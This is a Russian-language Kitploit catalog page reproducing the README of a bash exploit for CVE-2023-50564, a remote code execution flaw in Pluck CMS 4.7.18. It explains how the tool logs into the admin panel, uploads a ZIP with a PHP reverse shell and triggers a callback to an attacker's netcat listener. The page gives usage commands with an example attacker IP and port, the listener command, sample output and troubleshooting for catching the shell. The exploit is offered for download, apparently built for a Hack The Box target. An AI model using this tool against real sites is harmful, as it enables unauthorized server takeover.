Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Refurbish exploit in bash | Kitploit
Инструменты/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Payload GenerationExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Refurbish exploit in bash

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2023-50564 — Удалённое выполнение кода (RCE) в Pluck CMS v4.7.18

Описание

Этот скрипт эксплуатирует уязвимость удалённого выполнения кода (RCE) в Pluck CMS v4.7.18. Уязвимость позволяет злоумышленнику загрузить вредоносный PHP-файл на сервер и выполнить его, получив удалённое выполнение команд на целевой машине.

Скрипт автоматизирует весь процесс:

  1. Аутентификация в панели администратора Pluck CMS с использованием предоставленных учётных данных.
  2. Загрузка ZIP-файла, содержащего вредоносный PHP-скрипт reverse shell.
  3. Выполнение PHP reverse shell, что даёт атакующему удалённый доступ к целевой машине.

Примечание: Для получения reverse shell на машине атакующего должен быть запущен Netcat-слушатель.


Предварительные требования

Перед запуском скрипта убедитесь в следующем:

  • Netcat установлен и настроен слушатель для получения reverse shell.
  • У вас есть правильные хост цели, пароль, IP-адрес и порт для reverse shell.
  • У вас есть доступ к панели администратора Pluck CMS на цели.

Использование

root@kitploit:~
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>

Аргументы:

  • -h <host> — Целевой хост (например, greenhorn.htb).
  • -P <password> — Пароль для панели администратора Pluck CMS (например, abcd123).
  • -i <IP> — IP-адрес атакующего для получения reverse shell.
  • -p <port> — Порт, на котором запущен Netcat-слушатель для захвата reverse shell.

Пример:

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

Шаги:

  1. Настройте Netcat-слушатель: На машине атакующего запустите Netcat-слушатель на указанном порту:

    root@kitploit:~
    nc -nvlp <port>
    

    Например:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Запустите скрипт: Передайте скрипту необходимые параметры, включая хост, пароль, IP-адрес и порт.

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. Выполнение скрипта:

    • Скрипт входит в панель администратора Pluck CMS.
    • Он загружает ZIP-файл, содержащий PHP-скрипт reverse shell (love.php).
    • После загрузки ZIP-файла reverse shell выполняется на цели, и устанавливается соединение с вашим Netcat-слушателем.
    • Отображается сообщение: "RCE is waiting for you, please go take a look.", и скрипт завершается, фиксируя затраченное время.
  4. Доступ к цели: Как только reverse shell активирован, соединение появится в вашем Netcat-слушателе, предоставляя удалённый доступ к целевой машине.


POC

изображение

Пример вывода

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

Требования

  • cURL — для взаимодействия с Pluck CMS и загрузки файлов.
  • Netcat — для прослушивания reverse shell.

Если они не установлены, вы можете установить curl и netcat с помощью следующих команд:

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

root@kitploit:~
sudo yum install curl nc

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование скрипта незаконно и неэтично. Всегда получайте соответствующее разрешение перед эксплуатацией любой уязвимости в системе.


Устранение неполадок

  1. 504 Gateway Time-out: Скрипт может столкнуться с этой ошибкой при попытке выполнить reverse shell, но это не влияет на успешность выполнения shell. Ошибка обычно возникает из-за того, что целевой сервер слишком долго отвечает на HTTP-запрос, но shell всё равно должен сработать.

  2. Проблемы с Netcat-слушателем: Если вы не получили reverse shell, убедитесь, что ваш IP-адрес и порт установлены правильно, и что нет ограничений брандмауэра, препятствующих подключению цели к вашей машине.

  3. Скрипт не может войти: Если вход в панель администратора CMS не удаётся, проверьте предоставленный пароль и убедитесь, что CMS доступна на целевой машине.


Дайте знать, если потребуются дополнительные изменения или разъяснения в README!

Скачать инструмент